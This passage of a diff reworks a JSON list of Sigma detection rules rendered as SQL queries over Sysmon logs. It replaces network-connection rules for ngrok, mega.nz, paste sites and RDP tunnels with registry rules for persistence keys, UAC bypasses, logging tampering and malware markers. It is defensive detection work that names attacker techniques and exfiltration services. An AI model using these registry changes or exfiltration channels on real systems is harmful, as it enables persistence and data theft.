'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": 